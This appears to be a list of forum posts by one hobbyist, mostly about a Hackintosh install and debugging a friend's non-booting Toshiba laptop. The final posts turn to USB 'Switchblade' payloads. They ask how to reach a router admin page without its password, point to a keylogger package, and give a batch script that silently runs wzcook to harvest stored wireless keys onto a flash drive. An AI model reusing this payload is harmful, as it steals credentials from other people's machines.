    Hackintosh?

i'm dual booting win7 and snow leopard i am on a hackintosh right now and i love it, its very responsive it wasn't easy to install but it was well worth it i installed the vanilla snow leopard so updates are no problem for me but you do have to be careful before you upgrade cuz some updates will crash your computer i have a geekbench score that matches some of the new mac pro's -r1

    laptop problem

digip, i went into the BIOS and there is no way to manually set up the hdd. or at least i didn't see it. i put a windows recovery cd in there and it does see his hard drive. snakey, he doesn't have two spaces. but if the boot sector was bad would it still boot up fine in my laptop? vako, it's about a 4 or 5 year old laptop so i don't think so. aren't those fairly new? i asked him 2day to just get a new hard drive, i hope that works. we will see. -r1

    laptop problem

i tried to disable the lan ,and it did save it. so the battery is not dead. but it still gave me the same error msg. the HDD is not found in the bios but is found when i do a live cd (ubuntu) . so i would think it's seated right. ( i can even read and write to it.) as far as pulling out the cmos battery for a full restore. wouldn't flashing the bios with a update do the same thing?(set everything back to default along with upgrading itself)( i would say that his HDD is just a piece of crap but it works in my laptop just fine. -r1

    laptop problem

well, after the splash screen it says "Intel UNDI , pxe-2.0 (Build 082) Copyright © 1997-2000 Intel Corporation for Realtek RTL8139 (A/B/C)/RTL8130 PCI Fast Ethernet controller v2.12 (010425) PXE-E61 : media test failure, check cable PXE-M0F : Exiting PXE ROM" and just repeats it. i know it sounds like its tryin to boot up from the network but i went into the bios and the hard drive is number 1 while the network boot is last. also i went into the bios and it doesn't even see the hard drive. i just don't understand why my hard drive works great in his laptop while his does not? -r1

    laptop problem

i am working on a laptop for my friend. he has a Toshiba 1115-s103. anyways his hard drive stopped booting up. so i thought that it was his 1. hard drive 2. motherboard or 3. his BIOS. 1st i swapped out my laptop hard drive and put it in his laptop ,and it works fine. so i don't think its his motherboard or BIOS ,but i went ahead and flashed his BIOS still doesn't boot up with his hard drive. 2nd at this point I'm thinking its got to be his hard drive ,but i put his in my laptop and it boots fine. i don't understand why his hard drive won't boot up in his laptop? any help would be great!!! thanks -r1
  14. hey man, i really don't think there is a way for you to create a ISO for the CD partition. The U3 platform is not compatible with Linux. sorry man. -r1

    wireless admin access

What if you don’t have physical access to the router? I tried 2 Google it and all I can come up with is how to break the wep or wpa keys, that’s not what I’m looking for. *thanks for the help* -r1
  18. I have a question about wireless admin access. Is there a tool or way to gain access to the router setup page? like on an open network, when the setup page has a username and password on it different from the "linksys", "admin" default? Thanks for the help -r1
  19. never mind i found out the answer to my qestion -r1
  20. there is a key logger at http://www.hak5.org/packages with a readme.txt to tell you how to use it. i have a question what does the trash.exe on hak5.org/packages do? i cheked the Switchblade Packages page but nothing on it. and it doesn't come with a readme file -r1
  21. I’ll try my best to answer all your questions 1)when it is talking about the root of the flash drive it's talking about F: (since in your case the flash drive is on the "F" drive) 2)really on this question the best answer is to read the forums and Google the programs in question. (sorry for the lack of explanation on this one) 3)this files are system files so u'll need to a. go to F: b. go to the top of the window click on tools>folder options>view(tab)>(uncheck) hide protected operating system files c. edit WIPSBSsend.bat , WIPnmap_installsend.bat , and WIPVNCInstallfilessend.bat hope this helped you out -r1

    wzcook

thanks for replying, and i have fixed the ping loacl host and tskill. as far as what the progrm is, it retrieves the wireless passwords that the computer has used b4. its a cool little app and its perfect addon to this usb hack. where to get it? it comes in the aircrack -ng bundle **http://download.aircrack-ng.org/aircrack-ng-0.6.2-win.zip** i tried WIP instead of G: and it doesn't work right i have tried everything i could think of and nothing works. im confused about it :( -r1

    wzcook

i'm using spektormax's payload and it's working great, but i just wanted to add wzcook.exe to the mix so i wrote a .bat file for it --------------------------------------------------------------------- @ehco off start /b G:WIPwzcookwzcook.exe ::FOR WAITING ON WZCOOK TO FINSH (15 SEC) PING 1.1.1.1 -n 1 -w 15000 >NUL mkdir wipwzcook%computername% taskkill /F /IM wzcook.exe tskill wzcook.exe move c:wepkeys.txt WIPWZCOOK%computername% ---------------------------------------------------------------------- this .bat file only works in my laptop because the only way i could run wzcook.exe was to put G: but not all computers have the same drive letter for the usb drive. so my question is how can i rewrite this so wzcook.exe can work on any computer? p.s. i don't know if i need both of them but i put taskkill /F /IM wzcook.exe and tskill wzcook.exe so it would kill the task on home and pro -r1
